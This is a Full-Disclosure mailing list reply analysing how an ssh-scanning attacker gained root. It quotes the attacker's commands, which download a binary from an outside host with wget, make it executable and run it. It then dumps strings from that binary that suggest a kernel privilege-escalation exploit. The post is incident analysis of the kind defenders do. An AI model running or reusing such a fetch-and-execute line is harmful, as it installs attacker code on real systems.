Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning

Todd Towles wrote:

> It could be, but he said it was patched. I didn't run the test of
> course. 
>
> I never said it was the kernel however, it could be a service running.
> And unknown does not equal zero-day. But the tool got root and he
> doesn't know how. That is the point. Kernel, old service, whatever. It
> would be nice to find it.

If you take a look at this bit:

wget www.bo2k-rulez.net/a
chmod +x a
./a

The file "a" gives every superficial indication that it's a kernel 
exploit, if you want to go by a 20-second Notepad analysis:

[-] Unable to exit, entering neverending loop.
                 Kernel seems not to be vulnerable double allocation
            Unable to determine kernel address Unable to set up LDT 
     Unable to change page protection Invalid LDT entry Unable to jump 
to call gate /bin/sh Unable to spawn shell
                   PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to 
allocate memory Unable to unmap stack Unable to expand BSS 
/proc/sys/kernel/osrelease FATAL: kernel too old
       FATAL: cannot determine library version
 /dev/null  ;’;’(’„’Œ’                        malloc: using 
debugging hooks
  realloc(): invalid pointer %p!
 malloc: top chunk is corrupt
 Arena %d:
 system bytes     = %10u
 in use bytes     = %10u
 Total (incl. mmap):
 max mmap regions = %10u
 max mmap bytes   = %10lu
 free(): invalid pointer %p!
 TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_

                                                BB

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html